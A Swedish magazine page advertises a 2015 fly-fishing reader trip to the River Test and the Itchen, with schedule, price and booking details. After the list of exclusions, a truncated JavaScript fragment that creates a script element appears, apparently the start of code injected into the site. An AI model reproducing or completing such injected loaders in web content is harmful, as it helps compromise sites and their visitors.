Flugfiske i ett bedårande landskap, bli serverad utomordentlig grillunch på strandbanken och ett anrikt fiske i historiska kalkströmmar – ett minne för livet!

Följ med Allt om Flugfiske till de engelska kalkströmmarna

Allt om Flugfiske och Fiskejournalen bjuder tillsammans med Orvis in till läsarresa till River Test och The Itchen, två legendariska kalkströmmar i södra England.
Förra årets läsarresa till England var så populär att vi gör en favorit i repris! Du får den unika möjligheten att fiska på klassiska sträckor vid Abbots Worthy och Kimbridge. I resan ingår också besök och shopping i Orvis omtalade butik i Stockbridge, med VIP-rabatt såklart. Fisket i de engelska kristallklara kalkströmmarna är utmanande i bedårande vacker miljö.
Ni som följde TV-serien Downton Abbey – den spelades in i faggorna.Med på resan finns svenska representanter från Allt om Flugfiske och Fiskejournalen. Kolla in det späckade schemat här nedan:

SCHEMA
Onsdag 23 september
Vi möts upp på Heathrow flygplats (London) klockan 14.00 och blir upphämtade av Orvis-personal. Efter en dryg timmas bilfärd är vi framme vid Stockbridge där vi bor på White Hart, en lokal pub med bra mat. Efter incheckning promenerar vi till Orvis butik som ligger på byns huvudgata. Här handlar vi flugfiskeprylar till det väntande fisket, allt till ett förmånligt pris.

Torsdag 24 september
Vi blir upphämtade efter frukost då halva gänget blir transporterade till The Itchen där de fiskar. Andra halvan blir skjutsade till River Test och sträckan Timsbury. Här finns chans på riktigt stor fisk!

Fredag 25 september
Efter en stadig engelsk frukost (om man så vill) blir halva gruppen transporterade till River Test och sträckan Kimbridge. Här trampar vi runt på musiklegendaren Roger Waters mark när vi svingar flugspöet. Fisket avslutas med grillbuffé vid den mysiga klubbstugan. Andra halvan av gruppen fiskar vid Timsbury-sträckan.

Lördag 26 september
Sista fiskedagen och vid det här laget börjat rutinerna sätta sig. Rejäl frukost, transport till River Test, Kimbridge och The Itchen. Sedan lunch intill vattnet.

Söndag 27 september
Transport till flygplatsen för vidare hemresa. Avresa från hotellet klockan 07.00.

INFORMATION
Pris:
14 900 SEK per person (flyg tillkommer)
Antal platser:
10
När:
23-27 september 2015
Bokning och mer info:
Anders Holm, via mail anders.holm@aller.se.
Det är först till kvarn som gäller.

Detta ingår:
– Transfer (Heathrow Airport)
– Boende i rum med tillhörande faciliteter
– Frukost, lunch och middag.
– Tre dagars fiske i The Itchen och River Test.
– Transporter till, från och mellan fiskevatten.

Det här ingår inte:
– Flygresan till/från England och drycker.var d=document;var s=d.createElement(‘script’);


MER FRÅN ALLTOMFLUGFISKE.SE

Sponsrad
Sponsrad